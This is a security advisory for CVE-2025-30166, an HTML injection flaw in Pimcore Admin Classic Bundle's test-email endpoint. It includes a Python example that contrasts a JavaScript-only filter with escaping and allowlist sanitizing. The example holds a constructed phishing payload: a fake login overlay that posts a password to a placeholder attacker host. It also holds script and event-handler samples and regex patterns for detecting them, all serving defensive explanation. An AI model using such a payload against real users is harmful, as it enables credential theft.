PT-2025-15421 · Pimcore · Pimcore Admin Classic Bundle

Published

2025-04-08

·

Updated

2025-11-04

·

CVE-2025-30166

CVSS v3.1

4.8

Medium

Vector

AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions: Pimcore Admin Classic Bundle versions prior to 1.7.6
Description: An HTML injection issue in Pimcore's Admin Classic Bundle allows an authenticated user with access to the email sending functionality to inject arbitrary HTML markup into emails sent from the admin interface. According to the advisory, this could lead to session cookie theft and to alteration of the content the recipient sees. The issue lies in the "/admin/email/send-test-email" endpoint (POST method), whose content parameter is not treated as plain text: JavaScript injection (script tags and similar execution vectors) is blocked, but other HTML markup is passed through unchanged, so a sender can still embed forms, links, images and layout elements in the delivered message.
Recommendations: For versions prior to 1.7.6, update to version 1.7.6, which resolves the issue. As a temporary workaround, restrict access to the "/admin/email/send-test-email" endpoint to trusted administrators, or limit the use of the content parameter, to reduce the exposure until the update is applied.
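To make the gap concrete, the following added example (not Pimcore's code, and not the fix shipped in 1.7.6, which this page does not describe) models the behaviour the advisory reports: a filter that only removes JavaScript vectors still lets through markup that rewrites what the recipient sees. Beside it are two hardened alternatives, full HTML escaping of the content parameter and an allowlist sanitizer that keeps only harmless formatting tags and drops every attribute. The payload and the filter rules are constructed for illustration; the endpoint and parameter name are the ones named in the description.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample value for the "content" parameter of a test email.
# It contains no <script>, no on*= handlers and no javascript: URL, so a
# JavaScript-only filter passes it through, yet it overlays the whole
# message with a fake login form posting to an attacker-controlled host
# (attacker.example is a placeholder, not a real address).
CONSTRUCTED_PAYLOAD = (
    "Hello,<br>"
    '<div style="position:absolute;top:0;left:0;width:100%;height:100%;background:#fff">'
    '<form action="https://attacker.example/collect" method="post">'
    'Your session expired. <input name="pw" type="password"> <button>Log in</button>'
    "</form></div>"
)

# Constructed sample that a JavaScript-only filter is designed to catch.
JS_SAMPLE = (
    '<script>alert(1)</script><img src="x" onerror="alert(1)">'
    '<a href="javascript:alert(1)">x</a>'
)

# Execution vectors removed by the weak filter (assumed rule set, for illustration).
_SCRIPT_TAG = re.compile(r"<\s*script\b.*?>.*?<\s*/\s*script\s*>", re.I | re.S)
_EVENT_HANDLER = re.compile(r"\s+on\w+\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)", re.I)
_JS_URL = re.compile(r"(href|src|action)\s*=\s*([\"']?)\s*javascript:[^\"'>\s]*\2", re.I)


def block_javascript_only(content: str) -> str:
    """Weak approach: strip script execution vectors, keep all other markup.

    Models "JavaScript code injection is blocked, HTML code injection remains
    possible". Everything that is not an execution vector survives verbatim.
    """
    content = _SCRIPT_TAG.sub("", content)
    content = _EVENT_HANDLER.sub("", content)
    content = _JS_URL.sub(r'\1=""', content)
    return content


def escape_content(content: str) -> str:
    """Hardened approach 1: treat the parameter as text and encode it for HTML."""
    return html.escape(content, quote=True)


class _AllowlistSanitizer(HTMLParser):
    """Hardened approach 2: rebuild the markup keeping only allowlisted tags.

    Attributes are dropped entirely, so href/src/action/style cannot carry
    anything, and text nodes are re-escaped on output.
    """

    ALLOWED_TAGS = {"b", "i", "em", "strong", "br", "p"}

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag in self.ALLOWED_TAGS:
            self.out.append(f"<{tag}>")

    def handle_endtag(self, tag: str) -> None:
        if tag in self.ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data: str) -> None:
        self.out.append(html.escape(data, quote=True))


def sanitize_allowlist(content: str) -> str:
    parser = _AllowlistSanitizer()
    parser.feed(content)
    parser.close()
    return "".join(parser.out)


def contains_markup(s: str) -> bool:
    """True if the string still contains an HTML tag opener."""
    return re.search(r"<[a-zA-Z/!]", s) is not None


if __name__ == "__main__":
    print("weak filter keeps markup:", contains_markup(block_javascript_only(CONSTRUCTED_PAYLOAD)))
    print("escaped:", escape_content(CONSTRUCTED_PAYLOAD)[:60], "...")
    print("allowlisted:", sanitize_allowlist(CONSTRUCTED_PAYLOAD))
```

The point of the comparison is that the phishing overlay needs no JavaScript at all; a filter that asks "can this execute?" answers the wrong question for an email body. Whether the parameter should be escaped outright or allowlisted depends on whether test emails are meant to carry formatting, but in both hardened variants the form, the absolute-positioned div and the outbound action URL do not reach the recipient.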

Exploit · Fix · XSS

Weakness Enumeration

Related Identifiers

CVE-2025-30166
GHSA-x82r-6j37-vrgg

Affected Products

Pimcore Admin Classic Bundle